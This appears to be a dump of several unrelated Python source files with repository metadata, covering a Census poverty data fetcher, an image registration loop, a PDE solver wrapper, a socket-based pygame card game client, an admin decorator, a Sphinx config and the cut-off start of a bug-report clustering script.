Python
|
acs5countypoverty.py
|
dannmorr/greater-chicago-food-despository
|
8eb39ce4a4c72fa1c0f47fd81d474cb0727b67c1
|
[
"MIT"
] | null | null | null |
acs5countypoverty.py
|
dannmorr/greater-chicago-food-despository
|
8eb39ce4a4c72fa1c0f47fd81d474cb0727b67c1
|
[
"MIT"
] | null | null | null |
acs5countypoverty.py
|
dannmorr/greater-chicago-food-despository
|
8eb39ce4a4c72fa1c0f47fd81d474cb0727b67c1
|
[
"MIT"
] | null | null | null |
from census_response import getCensusResponse
import json
def main():
#Estimate!!Total!!Population for whom poverty status is determined
pop_table = 'S1701_C01_001E'
#Estimate!!Below poverty level!!Population for whom poverty status is determined
poverty_table = 'S1701_C02_001E'
subject_table = 'https://api.census.gov/data/2018/acs/acs5/subject?'
get_ls = [pop_table, poverty_table]
#county level request for IL (state 17)
geo = 'county:*&in=state:17'
response = getCensusResponse(subject_table, get_ls, geo)
#poverty_data is list of lists, where list elements are rows
#header row: name, population total, population poverty, fip state, fip county
poverty_data = response.json()
#Json format
    #{'countyfip': {'metric_one': 1234, 'metric_two': 5678}}
    #(countyfip = concatenation of the state and county fip numbers)
final_json = {}
for d in poverty_data[1:]:
#set variables to list elements
name, pop_total_str, pop_poverty_str, fip_state, fip_county = d
#convert strings to ints
pop_total_int = int(pop_total_str)
pop_poverty_int = int(pop_poverty_str)
#concat strings
fip_final = fip_state + fip_county
#calculate percent poverty
pct_poverty = pop_poverty_int / pop_total_int * 100
#create county json
county_json = {'name_county':name, 'population_total': pop_total_int, 'population_poverty': pop_poverty_int, 'percent_poverty': pct_poverty}
#set county key to county json value
final_json[fip_final] = county_json
#save file
with open('final_jsons/acs5countypoverty_output.json', 'w') as f:
json.dump(final_json, f)
return final_json
if __name__ == '__main__':
main()
| 34.5
| 148
| 0.687848
|
43c311b98e4c80a56505a12bda7ef80b0f716ed2
| 4,033
|
py
|
Python
|
iter.py
|
miki998/image_registration-maxwell_demons
|
9305ef2c5284231c67c920c8f57e5c5a52fe73f1
|
[
"MIT"
] | null | null | null |
iter.py
|
miki998/image_registration-maxwell_demons
|
9305ef2c5284231c67c920c8f57e5c5a52fe73f1
|
[
"MIT"
] | null | null | null |
iter.py
|
miki998/image_registration-maxwell_demons
|
9305ef2c5284231c67c920c8f57e5c5a52fe73f1
|
[
"MIT"
] | null | null | null |
import numpy as np
import matplotlib.image as mpimg
import matplotlib.pyplot as plt
import scipy
from scipy.interpolate import griddata
from scipy.ndimage import convolve
import cv2
import matplotlib.image as mpimg
import matplotlib.pyplot as plt
import numpy as np
import matplotlib as mpl
from scipy.ndimage import gaussian_filter
##################################################
#### Registration of source image, the grey anchor
##################################################
# Build a grid to recover the position of each pixel of the source image in the final registered image
# Be careful: with the inversion of A, you also need to invert the x and y axes.
xim,yim = np.meshgrid(np.arange(0,nr),np.arange(0,nc))
xim = xim.reshape(1,-1)
yim = yim.reshape(1,-1)
#Coordinates of pixels in source image, corresponding to each point of the grid xim, yim
#######################
####Fill here
#since we have a constant magnitude, we simply need to exert the same force
#on all pixels relative to these contours
n_iter = 5
tmpIreca = Ireca.copy()
tmpIref = Iref.copy()
for i in range(1,n_iter+1):
print('Iteration number {}'.format(i))
gridRegInv = np.zeros((2,xim.shape[1]))
force = 2
d_fieldx, d_fieldy = comp_forces(tmpIreca[:,cutil][rutil],tmpIref[:,cutil][rutil]
,gIref_x,gIref_y,demons,force,epsilon = 0.001)
break
    # regularize the deformation field using Gaussian smoothing (but keep the zeros where they are)
    # there should be no displacement where the light intensity is conserved
nonzx = np.nonzero(d_fieldx != 0)
nonzy = np.nonzero(d_fieldy != 0)
maskx = np.zeros(d_fieldx.shape)
masky = np.zeros(d_fieldy.shape)
for x,y in zip(nonzx[0],nonzx[1]): maskx[x,y] = 1
for x,y in zip(nonzy[0],nonzy[1]): masky[x,y] = 1
d_fieldx = gaussian_filter(d_fieldx * maskx,sigma=1)
d_fieldx /= gaussian_filter(maskx, sigma=1)
d_fieldx[np.logical_not(maskx)] = 0
d_fieldy = gaussian_filter(d_fieldy * masky,sigma=1)
d_fieldy /= gaussian_filter(masky, sigma=1)
d_fieldy[np.logical_not(masky)] = 0
print(len(np.nonzero(d_fieldx)[0]))
for idx in range(xim.shape[1]):
x,y = xim[0][idx],yim[0][idx]
gridRegInv[0,idx] = y - d_fieldx[y,x]
gridRegInv[1,idx] = x - d_fieldy[y,x]
##############################
### Build registered image with source pixel associated
Jreg = np.zeros((nr,nc))
for i in range(xim.shape[1]):
value_source = tmpIreca[int(round(gridRegInv[1,i]) + nr), int(round(gridRegInv[0,i]) + nc)]
Jreg[xim[:,i],yim[:,i]] = value_source
img_loss,loss = loss_compute(Jreg,Iref[:,cutil][rutil])
print('This iteration loss: {}'.format(loss))
#######################
# display original images and affine transformation result
######################
plt.figure(figsize=(15,15))
plt.subplot(1,4,1)
plt.imshow(Iref[:,cutil][rutil])
#plt.imshow(Ireca[:,cutil][rutil])
#plt.plot(Preca[0,PtsInd],Preca[1,PtsInd],'-ob',[Preca[0,PtsInd[2]],Preca[0,PtsInd[0]]],[Preca[1,PtsInd[2]],Preca[1,PtsInd[0]]],'-ob')
#plt.plot(Pref[0,PtsInd],Pref[1,PtsInd],'-or',[Pref[0,PtsInd[2]],Pref[0,PtsInd[0]]],[Pref[1,PtsInd[2]],Pref[1,PtsInd[0]]],'-or')
plt.title('Static Image')
plt.subplot(1,4,2)
plt.imshow(Ireca[:,cutil][rutil])
plt.title('Original moving image')
plt.subplot(1,4,3)
#plt.imshow(tmpIref[:,cutil][rutil])
plt.imshow(Jreg)
#plt.plot(Pref[0,PtsInd],Pref[1,PtsInd],'sr','LineWidth',2)
#plt.plot([Xreg1[0],Xreg2[0],Xreg3[0],Xreg1[0]],[Xreg1[1],Xreg2[1],Xreg3[1],Xreg1[1]],'-og','LineWidth',2)
plt.title('After registration');
plt.subplot(1,4,4)
plt.imshow(img_loss)
plt.title('Loss Image');
plt.show()
#update
tmpIreca = np.concatenate((np.concatenate([pad,pad,pad],axis=1),
np.concatenate([pad,Jreg*255,pad],axis=1),
np.concatenate([pad,pad,pad],axis=1)),axis=0)
| 36.333333
| 138
| 0.617902
|
4cad85b0f6a9c67e853a3b7b9ada6288b6d54de1
| 667
|
py
|
Python
|
dune-burgers/pymor-wrapper/python_solve_visualize.py
|
pymor/dune-burgers-demo
|
a9c86c685964b6fe38ce238381afec05b22e057f
|
[
"BSD-2-Clause"
] | null | null | null |
dune-burgers/pymor-wrapper/python_solve_visualize.py
|
pymor/dune-burgers-demo
|
a9c86c685964b6fe38ce238381afec05b22e057f
|
[
"BSD-2-Clause"
] | null | null | null |
dune-burgers/pymor-wrapper/python_solve_visualize.py
|
pymor/dune-burgers-demo
|
a9c86c685964b6fe38ce238381afec05b22e057f
|
[
"BSD-2-Clause"
] | null | null | null |
import sys
from pymor.discretizations.mpi import mpi_wrap_discretization
from pymor.tools import mpi
from pymor.vectorarrays.mpi import MPIVectorArrayAutoComm
from dune_burgers import discretize_dune_burgers
filename = sys.argv[1]
exponent = float(sys.argv[2])
times = map(int, sys.argv[3:])
if mpi.parallel:
d = mpi_wrap_discretization(lambda: discretize_dune_burgers(filename),
use_with=True, with_apply2=False, array_type=MPIVectorArrayAutoComm)
else:
d = discretize_dune_burgers(filename)
U = d.solve(exponent)
U_vis = U.empty()
U_vis.append(U, o_ind=times, remove_from_other=times)
d.visualize(U_vis, filename='out')
| 29
| 100
| 0.76012
|
4e3335bd85fa078bd2ff88fd2666f3ca1b5b18ba
| 14,756
|
py
|
Python
|
DD_client.py
|
hannu-hell/Dashun_Dama-Card-Game
|
293f0742c4c7f808600e7c92964b9d8299d97240
|
[
"MIT"
] | null | null | null |
DD_client.py
|
hannu-hell/Dashun_Dama-Card-Game
|
293f0742c4c7f808600e7c92964b9d8299d97240
|
[
"MIT"
] | null | null | null |
DD_client.py
|
hannu-hell/Dashun_Dama-Card-Game
|
293f0742c4c7f808600e7c92964b9d8299d97240
|
[
"MIT"
] | null | null | null |
from game import *
import os
import socket
import pickle
import threading
# Sets the position of the window to the coordinates
os.environ['SDL_VIDEO_WINDOW_POS'] = '1000,50'
# Game
game = Game()
player1 = None
opponentPlayedCards = []
playerPlayedCards = []
gameOver = False
player2_start_game = False
gamesPlayed = 0
player2wins = 0
def reset_game():
global game, player1, hand, player2_start_game
del hand
del game
game = Game()
player1 = None
player2_start_game = False
playerPlayedCards.clear()
opponentPlayedCards.clear()
def game_logic(p1, p2):
global gameOver, game, player2_start_game, gamesPlayed, player2wins
playerPlayedCards.append(p2.playedCard)
if player2_start_game is False:
if p2.remainingCards != 0:
if p1.playedCard.suit == p2.playedCard.suit:
high_card = game.compare_cards(p1.playedCard, p2.playedCard)
if high_card == p2.playedCard:
for i in playerPlayedCards:
p2.hand.insert(0, i)
for j in opponentPlayedCards:
p2.hand.insert(0, j)
p2.remainingCards = len(p2.hand)
print("-------PLAYER 2 has absorbed the cards-------")
print(f'You: {p2.playedCard}, Opponent: {p1.playedCard}')
playerPlayedCards.clear()
opponentPlayedCards.clear()
else:
p2.won = True
gameOver = True
# Connections
HOST = ""
PORT = 9999
c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
c.connect((HOST, PORT))
print("Connected to opponent")
hand = pickle.loads(c.recv(4096))
player2 = Player(hand)
player2.turn = False
# Creating Thread
def create_thread(target):
t = threading.Thread(target=target)
t.daemon = True
t.start()
def receiving_data():
global player2, player1, gameOver, hand, player2_start_game, gamesPlayed, player2wins
while True:
data = pickle.loads(c.recv(4096))
if type(data) == list:
gamesPlayed += 1
reset_game()
hand = data
if player2.won:
player2wins += 1
del player2
player2 = Player(hand)
player2.turn = False
else:
del player2
player2 = Player(hand)
player2_start_game = True
player2.turn = True
gameOver = False
else:
player1 = data
if not player1.won:
opponentPlayedCards.append(player1.playedCard)
if player2_start_game:
if player1.remainingCards != 0:
if player2.remainingCards > 0:
if player1.playedCard.suit == player2.playedCard.suit:
high_card = game.compare_cards(player1.playedCard, player2.playedCard)
if high_card == player2.playedCard:
for i in playerPlayedCards:
player2.hand.insert(0, i)
for j in opponentPlayedCards:
player2.hand.insert(0, j)
player2.remainingCards = len(player2.hand)
print("-------PLAYER 2 has absorbed the cards-------")
print(f'You: {player2.playedCard}, Opponent: {player1.playedCard}')
playerPlayedCards.clear()
opponentPlayedCards.clear()
else:
player2.won = True
gameOver = True
else:
gameOver = True
player2.turn = True
else:
gameOver = True
# Graphics
pygame.init()
winWidth = 400
winHeight = 400
cardWidth = 47
cardHeight = 62
playArea = (((winWidth/2)-50), ((winHeight/2)-50), 100, 100)
placeCardLeft = (playArea[0]+2, playArea[1]+50-cardHeight//2)
placeCardRight = (playArea[0]+playArea[3]-2-cardWidth, playArea[1]+50-cardHeight//2)
win = pygame.display.set_mode((winWidth, winHeight))
pygame.display.set_caption("DASHUN_DAMA")
p_last_card = ((winWidth//2-cardWidth//2)-2, (winHeight-cardHeight-50)-2, 50, 65)
o_last_card = ((winWidth//2-cardWidth//2)-2, 48, 50, 65)
o_card_rect = (165, 122, 90, 20)
p_card_rect = (165, 262, 90, 20)
o_card_num_rect = (220, 122, 30, 20)
p_card_num_rect = (220, 262, 30, 20)
p_rect = (220, winHeight-38, 50, 20)
o_rect = (220, 22, 100, 20)
o_set_rect = (20, 20, 120, 170)
p_set_rect = (20, 210, 120, 170)
color = (0, 0, 0)
cards_on_table_rect = (((winWidth/2)+60), ((winHeight/2)-15), 125, 30)
p_games_rect = (((winWidth/2)+60), ((winHeight/2)+20), 125, 30)
p_win_rect = (((winWidth/2)+60), (winHeight-cardHeight-20), 80, 30)
o_win_rect = (((winWidth/2)+60), 80, 80, 30)
def back_fill(rectangle):
pygame.draw.rect(win, color, rectangle)
def draw_layout(surf):
pygame.draw.rect(surf, (255, 0, 0), (10, 10, 380, 380), 2)
pygame.draw.rect(surf, (164, 90, 82), playArea)
back_fill(p_last_card)
back_fill(o_last_card)
if player2.remainingCards != 0:
surf.blit(card_back, ((winWidth//2-cardWidth//2), (winHeight-cardHeight-50)))
if (player1 is None) or (player1.remainingCards != 0):
surf.blit(card_back, ((winWidth//2-cardWidth//2), 50))
back_fill(p_set_rect)
back_fill(o_set_rect)
display_cards_in_hands(surf, player2, player1)
def display_cards_in_hands(surf, p1, p2):
p1_x_spacing, p2_x_spacing = 0, 0
p1_y, p2_y = 300, 40
if 0 < p1.remainingCards <= 10:
for _ in range(p1.remainingCards-1):
surf.blit(card_back, (25+p1_x_spacing, p1_y))
p1_x_spacing += 5
elif 10 < p1.remainingCards <= 20:
for _ in range(10):
surf.blit(card_back, (25+p1_x_spacing, p1_y))
p1_x_spacing += 5
p1_x_spacing = 0
for _ in range(p1.remainingCards-10-1):
surf.blit(card_back, (25+p1_x_spacing, p1_y-10))
p1_x_spacing += 5
elif 20 < p1.remainingCards <= 30:
for _ in range(2):
for _ in range(10):
surf.blit(card_back, (25+p1_x_spacing, p1_y))
p1_x_spacing += 5
p1_x_spacing = 0
p1_y -= 10
for _ in range(p1.remainingCards-20-1):
surf.blit(card_back, (25+p1_x_spacing, p1_y-10))
p1_x_spacing += 5
elif 30 < p1.remainingCards <= 40:
for _ in range(3):
for _ in range(10):
surf.blit(card_back, (25+p1_x_spacing, p1_y))
p1_x_spacing += 5
p1_x_spacing = 0
p1_y -= 10
for _ in range(p1.remainingCards-30-1):
surf.blit(card_back, (25 + p1_x_spacing, p1_y-10))
p1_x_spacing += 5
elif 40 < p1.remainingCards <= 52:
for _ in range(4):
for _ in range(10):
surf.blit(card_back, (25 + p1_x_spacing, p1_y))
p1_x_spacing += 5
p1_x_spacing = 0
p1_y -= 10
for _ in range(p1.remainingCards-40-1):
surf.blit(card_back, (25+p1_x_spacing, p1_y-10))
p1_x_spacing += 5
if p2 is not None:
if 0 < p2.remainingCards <= 10:
for _ in range(p2.remainingCards - 1):
surf.blit(card_back, (25 + p2_x_spacing, p2_y))
p2_x_spacing += 5
elif 10 < p2.remainingCards <= 20:
for _ in range(10):
surf.blit(card_back, (25 + p2_x_spacing, p2_y))
p2_x_spacing += 5
p2_x_spacing = 0
for _ in range(p2.remainingCards - 10 - 1):
surf.blit(card_back, (25 + p2_x_spacing, p2_y+10))
p2_x_spacing += 5
elif 20 < p2.remainingCards <= 30:
for _ in range(2):
for _ in range(10):
surf.blit(card_back, (25 + p2_x_spacing, p2_y))
p2_x_spacing += 5
p2_x_spacing = 0
p2_y += 10
for _ in range(p2.remainingCards - 20 - 1):
surf.blit(card_back, (25 + p2_x_spacing, p2_y+10))
p2_x_spacing += 5
elif 30 < p2.remainingCards <= 40:
for _ in range(3):
for _ in range(10):
surf.blit(card_back, (25 + p2_x_spacing, p2_y))
p2_x_spacing += 5
p2_x_spacing = 0
p2_y += 10
for _ in range(p2.remainingCards - 30 - 1):
surf.blit(card_back, (25 + p2_x_spacing, p2_y+10))
p2_x_spacing += 5
elif 40 < p2.remainingCards <= 52:
for _ in range(4):
for _ in range(10):
surf.blit(card_back, (25 + p2_x_spacing, p2_y))
p2_x_spacing += 5
p2_x_spacing = 0
p2_y += 10
for _ in range(p2.remainingCards - 40 - 1):
surf.blit(card_back, (25 + p2_x_spacing, p2_y+10))
p2_x_spacing += 5
else:
for _ in range(2):
for _ in range(10):
surf.blit(card_back, (25 + p2_x_spacing, p2_y))
p2_x_spacing += 5
p2_x_spacing = 0
p2_y += 10
for _ in range(5):
surf.blit(card_back, (25 + p2_x_spacing, p2_y + 10))
p2_x_spacing += 5
def draw_stats(surf):
font = pygame.font.Font(None, 20)
cards = font.render("CARDS: ", 1, (0, 128, 255))
back_fill(o_card_rect)
surf.blit(cards, (170, 125))
back_fill(p_card_rect)
surf.blit(cards, (170, 265))
p_cards = str(player2.remainingCards)
p_r_cards = font.render(p_cards, 1, (255, 255, 255))
back_fill(p_card_num_rect)
surf.blit(p_r_cards, (230, 265))
if player1 is not None:
o_cards = str(player1.remainingCards)
o_r_cards = font.render(o_cards, 1, (255, 255, 255))
back_fill(o_card_num_rect)
surf.blit(o_r_cards, (230, 125))
else:
o_r_cards = font.render("26", 1, (255, 255, 255))
back_fill(o_card_num_rect)
surf.blit(o_r_cards, (230, 125))
you = font.render("YOU", 1, (255, 255, 255))
opponent = font.render("OPPONENT", 1, (255, 255, 255))
back_fill(p_rect)
surf.blit(you, (230, winHeight - 35))
back_fill(o_rect)
surf.blit(opponent, (230, 25))
back_fill(cards_on_table_rect)
c_on_table = font.render("Cards on Table: " + f'{len(playerPlayedCards) + len(opponentPlayedCards)}', 1, (255, 255, 0))
surf.blit(c_on_table, (((winWidth/2) + 62), ((winHeight/2) - 13)))
back_fill(p_games_rect)
p_games = font.render("Games Played: " + f'{gamesPlayed}', 1, (255, 255, 0))
surf.blit(p_games, (((winWidth/2) + 62), ((winHeight/2) + 22)))
back_fill(p_win_rect)
p_wins = font.render("WINS : " + f'{player2wins}', 1, (255, 128, 0))
surf.blit(p_wins, (((winWidth / 2) + 62), (winHeight - cardHeight - 22)))
back_fill(o_win_rect)
o_wins = font.render("WINS : " + f'{gamesPlayed - player2wins}', 1, (255, 128, 0))
surf.blit(o_wins, (((winWidth / 2) + 62), 82))
def draw_player_turn(surf):
if not gameOver:
if player2.turn:
pygame.draw.circle(surf, (255, 0, 0), (winWidth // 2, 30), 10)
pygame.draw.circle(surf, (0, 255, 0), (winWidth // 2, 370), 10)
else:
pygame.draw.circle(surf, (0, 255, 0), (winWidth // 2, 30), 10)
pygame.draw.circle(surf, (255, 0, 0), (winWidth // 2, 370), 10)
else:
pygame.draw.circle(surf, (255, 0, 0), (winWidth // 2, 30), 10)
pygame.draw.circle(surf, (255, 0, 0), (winWidth // 2, 370), 10)
def you_won(surf):
font = pygame.font.Font(None, 24)
font_cont = pygame.font.Font(None, 15)
pygame.draw.rect(surf, (0, 0, 0), playArea)
won = font.render("YOU WON !", 1, (255, 128, 0))
cont1 = font_cont.render("Wait for opponent", 1, (0, 255, 0))
cont2 = font_cont.render("to play again", 1, (0, 255, 0))
surf.blit(won, (((winWidth / 2) - 45), ((winHeight / 2)-10)))
surf.blit(cont1, (((winWidth / 2) - 45), ((winHeight / 2)+20)))
surf.blit(cont2, (((winWidth / 2) - 35), ((winHeight / 2)+35)))
def you_lost(surf):
font = pygame.font.Font(None, 24)
font_cont = pygame.font.Font(None, 15)
pygame.draw.rect(surf, (0, 0, 0), playArea)
lost = font.render("YOU LOST !", 1, (255, 128, 0))
cont1 = font_cont.render("Wait for opponent", 1, (0, 255, 0))
cont2 = font_cont.render("to play again", 1, (0, 255, 0))
surf.blit(lost, (((winWidth / 2) - 45), ((winHeight / 2)-10)))
surf.blit(cont1, (((winWidth / 2) - 45), ((winHeight / 2)+20)))
surf.blit(cont2, (((winWidth / 2) - 35), ((winHeight / 2)+35)))
def play_area_update(surf):
pygame.draw.rect(surf, (164, 90, 82), playArea)
if not gameOver:
if player2_start_game is False:
if len(playerPlayedCards) != 0 and not player2.turn:
match_cards(surf, playerPlayedCards[-1], placeCardRight[0], placeCardRight[1])
if len(opponentPlayedCards) != 0:
match_cards(surf, opponentPlayedCards[-1], placeCardLeft[0], placeCardLeft[1])
else:
if len(playerPlayedCards) != 0:
match_cards(surf, playerPlayedCards[-1], placeCardRight[0], placeCardRight[1])
if len(opponentPlayedCards) != 0 and player2.turn:
match_cards(surf, opponentPlayedCards[-1], placeCardLeft[0], placeCardLeft[1])
else:
if player2.won:
you_won(surf)
else:
you_lost(surf)
def window_update():
draw_layout(win)
draw_player_turn(win)
play_area_update(win)
draw_stats(win)
pygame.display.update()
create_thread(receiving_data)
run = True
while run:
for event in pygame.event.get():
if event.type == pygame.QUIT:
c.close()
run = False
if event.type == pygame.MOUSEBUTTONDOWN and player2.turn and not gameOver:
if pygame.mouse.get_pressed()[0]:
if (winWidth//2 - cardWidth//2) <= pygame.mouse.get_pos()[0] <= (winWidth//2 + cardWidth//2):
if (winHeight-cardHeight-50) <= pygame.mouse.get_pos()[1] <= (winHeight-50):
player2.playedCard = player2.hand.pop()
player2.remainingCards -= 1
c.send(pickle.dumps(player2))
game_logic(player1, player2)
player2.turn = False
window_update()
| 36.982456
| 123
| 0.556113
|
740edacb746309a61143fdf6dc1773dc3f1f4d5e
| 1,169
|
py
|
Python
|
src/pyrin/admin/decorators.py
|
wilsonGmn/pyrin
|
25dbe3ce17e80a43eee7cfc7140b4c268a6948e0
|
[
"BSD-3-Clause"
] | null | null | null |
src/pyrin/admin/decorators.py
|
wilsonGmn/pyrin
|
25dbe3ce17e80a43eee7cfc7140b4c268a6948e0
|
[
"BSD-3-Clause"
] | null | null | null |
src/pyrin/admin/decorators.py
|
wilsonGmn/pyrin
|
25dbe3ce17e80a43eee7cfc7140b4c268a6948e0
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
admin decorators module.
"""
import pyrin.admin.services as admin_services
def admin(*args, **kwargs):
"""
decorator to register an admin page.
:param object args: admin class constructor arguments.
:param object kwargs: admin class constructor keyword arguments.
:keyword bool replace: specifies that if there is another registered
admin page with the same register name or the same entity,
replace it with the new one, otherwise raise
an error. defaults to False.
:raises InvalidAdminPageTypeError: invalid admin page type error.
:raises DuplicatedAdminPageError: duplicated admin page error.
:returns: admin class.
:rtype: type
"""
def decorator(cls):
"""
decorates the given class and registers an instance
of it into available admin pages.
:param type cls: admin class.
:returns: admin class.
:rtype: type
"""
instance = cls(*args, **kwargs)
admin_services.register(instance, **kwargs)
return cls
return decorator
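# Illustrative usage sketch (not part of the original module). The admin page
# class and its base below are hypothetical; the only behaviour relied on is
# what the decorator above shows: the decorated class is instantiated with the
# given arguments and the instance is registered via admin_services.register().
#
#     @admin(replace=True)
#     class UsersAdmin(SomeAdminPageBase):
#         ...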
| 25.977778
| 85
| 0.625321
|
6664a3b8e3f17a29cd59bcf4330e139913323c01
| 7,029
|
py
|
Python
|
examples/icme2017/evaluation/yael_v438/doc/conf-old.py
|
htyao89/ICME2017
|
bc302f7972a0791c6042a9c43bc3fe4c4fb13282
|
[
"BSD-2-Clause"
] | 4
|
2019-01-07T17:39:53.000Z
|
2020-02-26T03:20:18.000Z
|
MotionAnalysis/SVM_model/function/yael_v438/doc/conf-old.py
|
BumbleBee0819/Estimating_mechanical_properties_of_cloth
|
547bba3544bd686a7bac39c9985d89fcdf171642
|
[
"MIT"
] | 1
|
2020-09-24T07:42:13.000Z
|
2020-09-24T07:42:13.000Z
|
examples/icme2017/evaluation/yael_v438/doc/conf-old.py
|
htyao89/ICME2017
|
bc302f7972a0791c6042a9c43bc3fe4c4fb13282
|
[
"BSD-2-Clause"
] | 2
|
2019-08-12T20:49:39.000Z
|
2020-02-22T16:39:27.000Z
|
# -*- coding: utf-8 -*-
#
# Yael documentation build configuration file, created by
# sphinx-quickstart on Fri Aug 5 14:37:23 2011.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.pngmath']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Yael'
copyright = u'2010-2013, Herve Jegou & Matthijs Douze'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = 'VVV'
# The full version, including alpha/beta/rc tags.
release = 'VVV'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
#html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'Yaeldoc'
# -- Options for LaTeX output --------------------------------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'Yael.tex', u'Yael Documentation',
u'Herve Jegou \\& Matthijs Douze', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'yael', u'Yael Documentation',
[u'Herve Jegou & Matthijs Douze'], 1)
]
| 32.243119
| 80
| 0.718025
|
d3c73254200c57aacf94167e803ddb81032531df
| 5,807
|
py
|
Python
|
code_original/10_sort_supplementary_item.py
|
WuYff/CTRAS
|
22941f20f5ddc00849c7ea08cd8395defcaf3344
|
[
"MIT"
] | 1
|
2020-07-10T06:24:58.000Z
|
2020-07-10T06:24:58.000Z
|
code_original/10_sort_supplementary_item.py
|
WuYff/CTRAS
|
22941f20f5ddc00849c7ea08cd8395defcaf3344
|
[
"MIT"
] | 1
|
2020-12-23T08:03:11.000Z
|
2020-12-23T08:03:11.000Z
|
code_original/10_sort_supplementary_item.py
|
WuYff/CTRAS
|
22941f20f5ddc00849c7ea08cd8395defcaf3344
|
[
"MIT"
] | 2
|
2020-09-10T07:26:04.000Z
|
2020-10-19T07:11:13.000Z
|
#-*- coding:utf-8 -*-
import os
import numpy as np
from scipy.spatial import distance
from variables import POS_TAGS, APPS
from variables import DUPLICATES_CLUSTER_PATH, DUPLICATES_CLUSTER_IMG_PATH
from util_db import select_cluster_combine_tag
from util_db import select_cluster_id_txt, select_cluster_id_img
from util_db import select_cluster_txt_tag, select_cluster_img_tag
from util_db import insert_top_txt_into_sql, insert_top_img_into_sql
from util_hist import read_hist_img, get_img_pos
from util_hist import preprocess_line
from util_pagerank import graphMove, firstPr, pageRank
# ---------------------------------------------------------------------------------------
# Description : Function to sort the sentences/screenshots within each supplementary and save them to database
# ---------------------------------------------------------------------------------------
def distance_sentence_jaccard(sentence_a,sentence_b):
inter = 0
union = 0
for word_a in sentence_a:
if word_a in sentence_b:
inter = inter + 1
union = len(sentence_a) + len(sentence_b) - inter
return 1 - (inter*1.0)/(union*1.0)
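# Worked example (illustrative, not part of the original script): after
# processing(), every sentence is a list of [word, POS-tag] pairs, so the
# Jaccard distance above is computed over those pairs. The two sentences
# below are hypothetical.
def _jaccard_example():
    sentence_a = [['app', 'NN'], ['crashes', 'VBZ']]
    sentence_b = [['app', 'NN'], ['freezes', 'VBZ']]
    # shared pairs: 1, union: 2 + 2 - 1 = 3  ->  distance = 1 - 1/3 ~= 0.667
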